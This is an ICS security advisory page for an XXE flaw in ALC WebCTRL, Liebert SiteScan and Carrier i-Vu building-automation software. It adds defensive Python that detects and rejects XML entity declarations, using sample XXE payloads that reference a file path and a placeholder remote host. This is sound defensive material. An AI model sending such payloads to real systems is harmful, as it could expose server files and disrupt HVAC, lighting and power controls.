OTPulse

Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, Carrier i-VU

Monitor
CVSS: 6.5
Reference: ICS-CERT ICSA-17-150-01
Published: May 30, 2017
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: None needed
Summary

Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, and Carrier i-Vu contain an XML External Entity (XXE) injection vulnerability (CWE-611). The vulnerability affects versions 6.5 and earlier. An attacker can exploit this through a specially crafted XML request processed by the affected applications' web interfaces.

What this means
What could happen
An attacker could read sensitive files from the building automation system server or cause the service to become unavailable, potentially disrupting HVAC, lighting, and other building operations dependent on the web interface.
Who's at risk
Building automation and facilities management teams using ALC WebCTRL, Liebert SiteScan, or Carrier i-Vu systems should be concerned. These products are commonly deployed in data centers, commercial buildings, hospitals, and facilities to manage HVAC, lighting, power distribution, and environmental controls. Any organization with these systems exposed to untrusted networks is at risk.
How it could be exploited
An attacker with network access to the web interface (typically port 80 or 443) sends a malicious XML request containing an external entity definition. The vulnerable application parses the XML without proper validation and allows the attacker to read arbitrary files from the server or trigger a denial-of-service condition.
Prerequisites
  • Network access to the web interface of the affected application
  • Application must be accessible from attacker's network segment
  • No credentials required to trigger the vulnerability
Tags:
  • remotely exploitable
  • no authentication required
  • low complexity
  • no patch available
  • affects building automation and HVAC control
Exploitability
Low exploit probability (EPSS 0.7%)
Affected products (3), 3 EOL

Product | Affected Versions | Fix Status
Carrier i-Vu | ≤ 6.5 | No fix (EOL)
ALC WebCTRL | ≤ 6.5 | No fix (EOL)
Liebert SiteScan Web (Version 6.5 and prior) | ≤ 6.5 | No fix (EOL)
Remediation & Mitigation
Do now
HARDENING: Restrict network access to the web interface using firewall rules—allow only trusted engineering workstations and management networks to reach the application on its listening port
HARDENING: Deploy the application behind a reverse proxy or WAF (Web Application Firewall) configured to detect and block malicious XML requests and XXE payloads
WORKAROUND: Disable XML external entity processing at the application level if configuration options are available
Schedule — requires maintenance window

Patching may require device reboot — plan for process interruption

HARDENING: Monitor web server logs for suspicious XML requests containing entity definitions or file path traversal patterns
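The "How it could be exploited" description and the two items above (blocking external entity processing, and monitoring for requests that carry entity definitions) can be backed by the same check. The following is an added example, not code from the advisory or from the vendors' products: a pre-parse gate that refuses any XML body declaring a DTD or external entity, and a scan that applies the same test to captured request bodies. All request bodies, paths and addresses are constructed placeholders.

```python
"""Added example (not part of the advisory or the vendors' products): a
pre-parse gate and a log-style scan for XXE indicators.
Sample request bodies, paths and addresses below are constructed placeholders."""
import re
import xml.etree.ElementTree as ET

# A DOCTYPE is where entity declarations live; a normal API request has no
# reason to carry one, so its presence alone is the primary indicator.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# An entity that names an external resource (SYSTEM/PUBLIC); a leading '%'
# marks a parameter entity, the form used for out-of-band/blind variants.
EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)

def xxe_indicators(body):
    """Return the indicator names found in an XML body (empty list if clean)."""
    found = []
    if DOCTYPE_RE.search(body):
        found.append("doctype")
    m = EXT_ENTITY_RE.search(body)
    if m:
        found.append("parameter-entity" if m.group(1) else "external-entity")
    return found

def parse_untrusted_xml(body):
    """Parse only after the DTD gate passes; return the root element's tag.
    Rejecting any DTD up front also blocks internal entity expansion
    (billion laughs) and behaves the same whichever parser the app uses."""
    indicators = xxe_indicators(body)
    if indicators:
        raise ValueError("rejected XML request: " + ", ".join(indicators))
    return ET.fromstring(body).tag

def scan_requests(requests):
    """requests: iterable of (client_ip, path, body); returns one alert per hit."""
    return [{"client": ip, "path": path, "indicators": xxe_indicators(body)}
            for ip, path, body in requests if xxe_indicators(body)]

# Constructed sample traffic: one benign request, two that declare entities.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/PLACEHOLDER/api", "<request><point>zone1.temp</point></request>"),
    ("192.0.2.44", "/PLACEHOLDER/api",
     '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///PLACEHOLDER">]>'
     "<request><point>&x;</point></request>"),
    ("192.0.2.44", "/PLACEHOLDER/api",
     '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://PLACEHOLDER.example/">%p;]><r/>'),
]
```

Feed scan_requests() the bodies extracted from the web server or reverse proxy log; a non-empty alert list is the signal the monitoring item above asks for.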
Mitigations - no patch available
The following products have reached End of Life with no planned fix: Carrier i-Vu, ALC WebCTRL, and Liebert SiteScan Web (Version 6.5 and prior). Apply the following compensating controls:
HARDENING: Segment the building automation network from general corporate networks using a DMZ or separate VLAN to limit lateral movement
API: /api/v1/advisories/8d68a97b-f294-4b57-832e-12812203ea3a
Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, Carrier i-VU | CVSS 6.5 - OTPulse